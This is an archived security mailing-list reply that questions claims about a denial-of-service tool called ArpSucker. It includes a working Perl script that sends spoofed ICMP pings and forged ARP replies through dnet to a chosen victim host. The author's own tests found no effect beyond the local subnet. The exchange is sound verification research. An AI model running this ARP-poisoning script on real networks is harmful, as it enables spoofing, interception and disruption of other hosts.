[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <86y8jbc1z1.fsf@home.nest.cx>
From: greg at y2004.nest.cx (Gregory Steuck)
Subject: Re: The ArpSucker is b0rn! Be yourself, be the net.
>>>>> "alpt" == alpt <alpt@...aknet.org> writes:
alpt> Then when I tried to become all the 2^32-1 IPs, I realized
alpt> that the attacked machine (elibus and pallotron, eheheh), were
alpt> under a mortal DoS. The Elibus' machine was constantly at 100%
alpt> of cpu until Elibus unplugged the eth0 cable, while the
alpt> Pallotron's machine went in kernel panic!. Elibus uses an x86
alpt> arch with the linux kernel, pallotron uses An Apple I-book,
alpt> with MacOsx.
I am not sure if this report is accurate. I played a little with the
attached perl script which should be doing the same thing that ArpSucker
alleges to do. I ran the script against OpenBSD 3.6 and Linux
2.4.22-gentoo-r5. Both of them only accept the directly attached net
addresses (/24 in my case) into the arp cache. Anything beyond that has
no observable effect except echo reply sent along the default route.
Running: arp-poison.pl <victim> <spoof_start> <count> <intf>
Granted the performance of the script is way lower than a single process
would have, but I doubt that running it any faster makes arp cache
accept non-directly-connect entries.
Has anybody validated the original claim?
Thanks
Greg
#!/usr/bin/perl
use strict;
sub ip_to_int($) {
my ($a, $b, $c, $d) = split(/\./, $_[0]);
return ($a << 24) + ($b << 16) + ($c << 8) + $d;
}
sub int_to_ip($) {
my ($ip) = @_;
return ($ip >> 24) . "." . (($ip >> 16) & 255) . "." . (($ip >> 8) & 255) . "." . ($ip & 255);
}
sub system_or_die(@) {
system (@_);
die join(' ', @_) . " failed with exit code " . ($? >> 8) . "\n"
unless $? == 0;
}
my $spoof_eth = '00:11:2f:77:77:77';
my ($victim_ip, $start_ip, $count, $intf) = @ARGV[0..3];
system_or_die ('ping', '-c', '1', $victim_ip);
my $victim_eth = (split (/\s+/, `dnet arp show | grep $victim_ip`))[2];
die "Cannot determine $victim_ip's ethernet address received $victim_eth\n"
unless split(/:/, $victim_eth) == 6;
my $start_int = ip_to_int($start_ip);
for (my $i = 0; $i < $count; $i++) {
my $spoof_ip = int_to_ip($start_int + $i);
system_or_die(
qq[echo 'aaaaaaaaaaaa' |
dnet icmp type 8 code 0 |
dnet ip proto icmp src $spoof_ip dst $victim_ip |
dnet eth type ip src $spoof_eth dst $victim_eth |
sudo dnet send $intf ]);
system_or_die(
qq[dnet arp op rep sha $spoof_eth spa $spoof_ip tha $victim_eth tpa $victim_ip |
dnet eth type arp src $spoof_eth dst $victim_eth |
sudo dnet send $intf ]);
}
Powered by blists - more mailing lists